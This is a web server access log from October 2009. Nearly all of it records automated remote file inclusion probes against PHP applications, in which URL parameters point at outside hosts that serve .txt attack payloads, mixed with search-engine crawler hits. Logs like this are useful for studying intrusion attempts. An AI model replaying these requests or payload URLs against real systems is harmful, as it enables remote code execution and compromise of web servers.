85.94.201.138 - - [16/Oct/2009:06:00:28 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:28 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:28 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:45 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:45 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:45 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:51 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:51 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:52 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:58 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:58 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:00:58 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:06:02:59 -0500] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://isodevil.sitebr.net/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:06:02:59 -0500] "GET //lib/Loggix/Module/Calendar.php?pathToIndex=http://isodevil.sitebr.net/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
220.125.237.35 - - [16/Oct/2009:06:02:59 -0500] "GET /logs/access_log.1253491200//lib/Loggix/Module/Calendar.php?pathToIndex=http://isodevil.sitebr.net/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:19 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:19 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:19 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:19 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:20 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:21 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:21 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:21 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:21 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:29 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:29 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:29 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:38 -0500] "GET /logs/access_log.1229990400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:41 -0500] "GET /logs/access_log.1229990400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:42 -0500] "GET /logs/access_log.1229990400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:06:03:53 -0500] "GET /logs/access_log.1229990400//include/bbs.lib.inc.php?site_path=http://jampot.webng.com/set1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:06:08:16 -0500] "GET /logs/access_log.1244764800//?_SERVER[DOCUMENT_ROOT]=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:06:09:05 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 200 209042 "-""Mozilla/5.0"
65.55.207.76 - - [16/Oct/2009:06:09:31 -0500] "GET /logs/access_log.1125619200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
147.46.116.207 - - [16/Oct/2009:06:09:44 -0500] "GET /logs/access_log.1229990400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
147.46.116.207 - - [16/Oct/2009:06:09:44 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.193.15.3 - - [16/Oct/2009:06:10:14 -0500] "GET /logs/access_log.1250726400//?_SERVER[DOCUMENT_ROOT]=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
147.46.116.207 - - [16/Oct/2009:06:10:31 -0500] "GET /logs/access_log.1229990400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
147.46.116.207 - - [16/Oct/2009:06:10:31 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.208.134 - - [16/Oct/2009:06:10:32 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [16/Oct/2009:06:10:34 -0500] "GET /logs/access_log.1255219200 HTTP/1.1" 200 1081344 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.200.205.58 - - [16/Oct/2009:06:11:43 -0500] "GET /logs/access_log.1250208000//skin/buzzard/setup.php/error.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.200.205.58 - - [16/Oct/2009:06:11:43 -0500] "GET //skin/buzzard/setup.php/error.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
74.200.205.58 - - [16/Oct/2009:06:11:43 -0500] "GET /logs//skin/buzzard/setup.php/error.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.106.210 - - [16/Oct/2009:06:12:32 -0500] "GET /logs/access_log.1202428800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.127.253.142 - - [16/Oct/2009:06:15:00 -0500] "GET ///?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:06:15:00 -0500] "GET /logs/access_log.1228608000///?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:06:15:02 -0500] "GET /logs///?_zb_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 200 209043 "-""Mozilla/5.0"
65.55.207.123 - - [16/Oct/2009:06:17:32 -0500] "GET / HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.120 - - [16/Oct/2009:06:22:18 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.117.169.182 - - [16/Oct/2009:06:22:18 -0500] "GET /logs//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:06:22:18 -0500] "GET //setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.117.169.182 - - [16/Oct/2009:06:22:18 -0500] "GET /logs/access_log.1250899200//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.207.120 - - [16/Oct/2009:06:23:02 -0500] "GET /_vti_cnf/?M=D HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.196.219.6 - - [16/Oct/2009:06:24:21 -0500] "GET /modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:24:21 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:24:21 -0500] "GET /logs/access_log.1233532800/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.139.67.116 - - [16/Oct/2009:06:25:01 -0500] "GET //skin/zero_vote/admin.php?dir=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 308 "-""Mozilla/5.0"
65.55.207.47 - - [16/Oct/2009:06:25:01 -0500] "GET /logs/access_log.1126483200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.139.67.116 - - [16/Oct/2009:06:25:04 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/admin.php?dir=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.139.67.116 - - [16/Oct/2009:06:25:05 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 313 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:14 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:14 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:14 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:14 -0500] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:15 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:15 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:15 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:25:29 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.106.185 - - [16/Oct/2009:06:26:31 -0500] "GET /logs/access_log.1120089600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.206.120.162 - - [16/Oct/2009:06:27:20 -0500] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:20 -0500] "GET /logs/access_log.1239753600/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:20 -0500] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:20 -0500] "GET /logs/access_log.1247356800/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:26 -0500] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:26 -0500] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:26 -0500] "GET /logs/access_log.1239753600/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:26 -0500] "GET /logs/access_log.1247356800/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:33 -0500] "GET /logs/access_log.1239753600/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:33 -0500] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:33 -0500] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:27:33 -0500] "GET /logs/access_log.1247356800/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://ihent.ru//id1.txt?? HTTP/1.1" 404 406 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:34 -0500] "GET ///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:34 -0500] "GET /logs/access_log.1251676800///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:35 -0500] "GET /logs/access_log.1251763200///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:35 -0500] "GET /logs///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:43 -0500] "GET /logs///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:43 -0500] "GET /logs/access_log.1251676800///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:27:44 -0500] "GET ///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
70.85.145.234 - - [16/Oct/2009:06:28:28 -0500] "GET /logs/access_log.1251417600//skin/happycast_category_lightblack/setup.php?dir=http://www.redcanary.com/home//components/com_virtuemart/shop_image/baner.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
70.85.145.234 - - [16/Oct/2009:06:28:28 -0500] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://www.redcanary.com/home//components/com_virtuemart/shop_image/baner.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
70.85.145.234 - - [16/Oct/2009:06:28:28 -0500] "GET //skin/happycast_category_lightblack/setup.php?dir=http://www.redcanary.com/home//components/com_virtuemart/shop_image/baner.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:28:56 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:28:56 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:28:56 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:28:56 -0500] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:29:29 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:29:29 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:29:29 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
65.55.106.135 - - [16/Oct/2009:06:30:31 -0500] "GET /logs/access_log.1128124800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.97.212.185 - - [16/Oct/2009:06:30:38 -0500] "GET //skin/jiyoo_red/login.php?dir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:06:30:38 -0500] "GET /logs/access_log.1252281600//skin/jiyoo_red/login.php?dir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:06:30:38 -0500] "GET /logs//skin/jiyoo_red/login.php?dir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
63.223.85.28 - - [16/Oct/2009:06:32:01 -0500] "GET /logs/access_log.1241049600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bellangora.fr//mail/x1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:32:06 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:32:06 -0500] "GET /modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:32:06 -0500] "GET /logs/access_log.1233532800/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:32:17 -0500] "GET /logs/access_log.1252281600/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.55.207.50 - - [16/Oct/2009:06:32:31 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.117.169.182 - - [16/Oct/2009:06:32:47 -0500] "GET /logs/access_log.1253404800//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.85.145.234 - - [16/Oct/2009:06:33:10 -0500] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://www.redcanary.com/home//components/com_virtuemart/shop_image/yes.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
70.85.145.234 - - [16/Oct/2009:06:33:10 -0500] "GET //dm-albums/template/album.php?SECURITY_FILE=http://www.redcanary.com/home//components/com_virtuemart/shop_image/yes.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
65.55.207.121 - - [16/Oct/2009:06:34:02 -0500] "GET /logs/access_log.1163289600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.196.219.6 - - [16/Oct/2009:06:35:41 -0500] "GET /logs/access_log.1237248000/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:35:53 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
202.131.226.52 - - [16/Oct/2009:06:38:46 -0500] "GET //template.php?pagina=http://ihent.ru//id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
202.131.226.52 - - [16/Oct/2009:06:38:46 -0500] "GET /logs/access_log.1239667200//template.php?pagina=http://ihent.ru//id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.131.226.52 - - [16/Oct/2009:06:38:46 -0500] "GET /logs//template.php?pagina=http://ihent.ru//id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
202.131.226.52 - - [16/Oct/2009:06:38:46 -0500] "GET /logs/access_log.1238371200//template.php?pagina=http://ihent.ru//id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.139.67.116 - - [16/Oct/2009:06:39:00 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.139.67.116 - - [16/Oct/2009:06:39:00 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.139.67.116 - - [16/Oct/2009:06:39:00 -0500] "GET /logs/access_log.1248480000//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.139.67.116 - - [16/Oct/2009:06:39:01 -0500] "GET /logs/access_log.1242691200//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 348 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:39:08 -0500] "GET /logs/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:39:08 -0500] "GET /resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:39:08 -0500] "GET /logs/access_log.1239667200/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:39:08 -0500] "GET /logs/access_log.1238371200/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.222.131.59 - - [16/Oct/2009:06:40:26 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.222.131.59 - - [16/Oct/2009:06:40:26 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 326 "-""Mozilla/5.0"
77.222.131.59 - - [16/Oct/2009:06:40:33 -0500] "GET /logs/access_log.1242691200//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.207.24 - - [16/Oct/2009:06:41:01 -0500] "GET /logs/access_log.1130457600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.97.212.185 - - [16/Oct/2009:06:41:45 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
